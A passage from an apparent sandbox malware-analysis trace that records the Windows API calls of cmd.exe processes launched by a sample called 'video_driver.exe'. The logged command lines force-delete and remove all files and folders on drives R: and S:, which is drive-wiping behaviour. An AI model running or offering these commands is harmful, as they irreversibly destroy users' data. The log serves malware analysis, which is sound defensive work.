lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.147] RegCloseKey (hKey=0x68) returned 0x0 [0065.147] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.147] srand (_Seed=0x5eb34b6b) [0065.147] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" [0065.147] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" [0065.147] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.148] GetProcessHeap () returned 0x310000 [0065.148] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x210) returned 0x3220f8 [0065.148] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x322100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.148] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.148] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.148] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.148] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.148] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.148] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.148] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.148] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.148] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.148] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.148] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.148] GetProcessHeap () returned 0x310000 [0065.148] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x322bd0 | out: hHeap=0x310000) returned 1 [0065.149] GetEnvironmentStringsW () returned 0x322310* [0065.149] GetProcessHeap () returned 0x310000 [0065.149] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xae2) returned 0x324c70 [0065.149] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0065.149] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.149] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.149] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.149] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.149] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.149] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.149] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.149] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.149] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.149] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.149] GetProcessHeap () returned 0x310000 [0065.149] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x54) returned 0x3217c8 [0065.149] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f570 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f570, lpFilePart=0x18f56c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f56c*="Desktop") returned 0x25 [0065.150] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.150] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x325760 [0065.150] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0065.150] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x325760 [0065.150] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0065.150] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.150] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x325760 [0065.150] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0065.151] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.151] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.151] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.151] GetProcessHeap () returned 0x310000 [0065.151] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x324c70 | out: hHeap=0x310000) returned 1 [0065.151] GetEnvironmentStringsW () returned 0x324180* [0065.151] GetProcessHeap () returned 0x310000 [0065.151] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb36) returned 0x325fa0 [0065.151] FreeEnvironmentStringsW (penv=0x324180) returned 1 [0065.151] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.151] GetProcessHeap () returned 0x310000 [0065.151] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x3217c8 | out: hHeap=0x310000) returned 1 [0065.151] GetProcessHeap () returned 0x310000 [0065.151] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x400e) returned 0x326ae0 [0065.152] GetProcessHeap () returned 0x310000 [0065.152] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xa0) returned 0x322e50 [0065.152] GetProcessHeap () returned 0x310000 [0065.152] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x326ae0 | out: hHeap=0x310000) returned 1 [0065.152] GetConsoleOutputCP () returned 0x1b5 [0065.153] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.153] GetUserDefaultLCID () returned 0x409 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="1") returned 2 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.154] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.155] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.155] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.172] GetProcessHeap () returned 0x310000 [0065.172] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x20c) returned 0x322ef8 [0065.172] GetConsoleTitleW (in: lpConsoleTitle=0x322ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.173] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.173] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.173] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.173] GetProcessHeap () returned 0x310000 [0065.173] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x400a) returned 0x326ae0 [0065.174] GetProcessHeap () returned 0x310000 [0065.174] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4008) returned 0x32aaf8 [0065.174] GetProcessHeap () returned 0x310000 [0065.174] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x1a) returned 0x3257e0 [0065.174] GetEnvironmentVariableW (in: lpName="p IN (\"R", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="CD") returned 13 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="ERRORLEVEL") returned 11 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="CMDEXTVERSION") returned 13 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="CMDCMDLINE") returned 13 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="DATE") returned 12 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="TIME") returned -4 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="RANDOM") returned -2 [0065.174] _wcsicmp (_String1="p IN (\"R", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.174] GetProcessHeap () returned 0x310000 [0065.174] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x3257e0 | out: hHeap=0x310000) returned 1 [0065.174] GetProcessHeap () returned 0x310000 [0065.175] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aaf8 | out: hHeap=0x310000) returned 1 [0065.175] GetProcessHeap () returned 0x310000 [0065.175] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4008) returned 0x32aaf8 [0065.175] GetProcessHeap () returned 0x310000 [0065.175] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aaf8 | out: hHeap=0x310000) returned 1 [0065.175] GetProcessHeap () returned 0x310000 [0065.175] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x326ae0 | out: hHeap=0x310000) returned 1 [0065.175] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.175] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.175] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.175] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.175] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.175] GetProcessHeap () returned 0x310000 [0065.175] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323110 [0065.175] GetProcessHeap () returned 0x310000 [0065.175] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe) returned 0x31ffc0 [0065.176] GetProcessHeap () returned 0x310000 [0065.176] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3257e0 [0065.177] GetProcessHeap () returned 0x310000 [0065.177] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3257e0, Size=0x16) returned 0x321800 [0065.177] GetProcessHeap () returned 0x310000 [0065.177] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x321800) returned 0x16 [0065.177] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323170 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x3231d0 [0065.178] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.178] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x3231f0 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x1c) returned 0x3257e0 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3257e0, Size=0x14) returned 0x323210 [0065.178] GetProcessHeap () returned 0x310000 [0065.178] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x323210) returned 0x14 [0065.179] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.179] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.179] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.179] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.179] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.179] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.179] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.179] GetProcessHeap () returned 0x310000 [0065.179] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323230 [0065.179] GetProcessHeap () returned 0x310000 [0065.179] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x10) returned 0x31ffd8 [0065.180] GetProcessHeap () returned 0x310000 [0065.180] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x28) returned 0x323290 [0065.180] GetProcessHeap () returned 0x310000 [0065.180] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x3232c0 [0065.181] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.181] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.181] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.181] GetProcessHeap () returned 0x310000 [0065.181] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323320 [0065.181] GetProcessHeap () returned 0x310000 [0065.181] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x44) returned 0x323380 [0065.181] GetProcessHeap () returned 0x310000 [0065.181] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x3233d0 [0065.182] GetProcessHeap () returned 0x310000 [0065.182] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3233d0, Size=0x12) returned 0x3233d0 [0065.182] GetProcessHeap () returned 0x310000 [0065.182] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3233d0) returned 0x12 [0065.182] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.182] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.182] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.182] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.182] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.182] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.183] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.183] GetProcessHeap () returned 0x310000 [0065.183] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x3233f0 [0065.184] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.184] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.184] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.184] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.184] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.184] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.184] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.184] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.185] GetProcessHeap () returned 0x310000 [0065.185] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323410 [0065.185] GetProcessHeap () returned 0x310000 [0065.185] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x323470 [0065.185] GetProcessHeap () returned 0x310000 [0065.185] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3257e0 [0065.187] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.189] GetFullPathNameW (in: lpFileName="R:", nBufferLength=0x208, lpBuffer=0x18f3a0, lpFilePart=0x18f14c | out: lpBuffer="R:\\", lpFilePart=0x18f14c*=0x0) returned 0x3 [0065.190] wcsncmp (_String1="R:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -10 [0065.195] GetFileAttributesW (lpFileName="R:\\" (normalized: "r:")) returned 0xffffffff [0065.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.195] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.195] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.195] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.196] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.196] SetConsoleInputExeNameW () returned 0x1 [0065.196] GetConsoleOutputCP () returned 0x1b5 [0065.196] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.196] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.196] exit (_Code=0) Process: id = "39" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42522000" os_pid = "0xad8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0xac4 [0065.304] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x38fcfc | out: lpSystemTimeAsFileTime=0x38fcfc*(dwLowDateTime=0x4bddd00, dwHighDateTime=0x1d62400)) [0065.304] GetCurrentProcessId () returned 0xad8 [0065.304] GetCurrentThreadId () returned 0xac4 [0065.304] GetTickCount () returned 0x1147c42 [0065.304] QueryPerformanceCounter (in: lpPerformanceCount=0x38fcf4 | out: lpPerformanceCount=0x38fcf4*=18544310683) returned 1 [0065.311] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.312] __set_app_type (_Type=0x1) [0065.312] __p__fmode () returned 0x770331f4 [0065.312] __p__commode () returned 0x770331fc [0065.312] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.313] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.313] GetCurrentThreadId () returned 0xac4 [0065.313] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac4) returned 0x60 [0065.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.313] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.313] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.314] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x38fc8c | out: phkResult=0x38fc8c*=0x0) returned 0x2 [0065.314] VirtualQuery (in: lpAddress=0x38fcc3, lpBuffer=0x38fc5c, dwLength=0x1c | out: lpBuffer=0x38fc5c*(BaseAddress=0x38f000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.314] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x38fc5c, dwLength=0x1c | out: lpBuffer=0x38fc5c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.314] VirtualQuery (in: lpAddress=0x291000, lpBuffer=0x38fc5c, dwLength=0x1c | out: lpBuffer=0x38fc5c*(BaseAddress=0x291000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.314] VirtualQuery (in: lpAddress=0x293000, lpBuffer=0x38fc5c, dwLength=0x1c | out: lpBuffer=0x38fc5c*(BaseAddress=0x293000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.315] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x38fc5c, dwLength=0x1c | out: lpBuffer=0x38fc5c*(BaseAddress=0x390000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x140000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.315] GetConsoleOutputCP () returned 0x1b5 [0065.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.315] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.315] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.316] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.316] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.316] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.316] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.316] GetEnvironmentStringsW () returned 0x6a20f8* [0065.316] GetProcessHeap () returned 0x690000 [0065.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a2bd0 [0065.317] FreeEnvironmentStringsW (penv=0x6a20f8) returned 1 [0065.317] GetProcessHeap () returned 0x690000 [0065.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a1898 [0065.317] GetEnvironmentStringsW () returned 0x6a20f8* [0065.317] GetProcessHeap () returned 0x690000 [0065.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a36a8 [0065.317] FreeEnvironmentStringsW (penv=0x6a20f8) returned 1 [0065.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38ebfc | out: phkResult=0x38ebfc*=0x68) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x0, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x1, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x1, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x0, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", 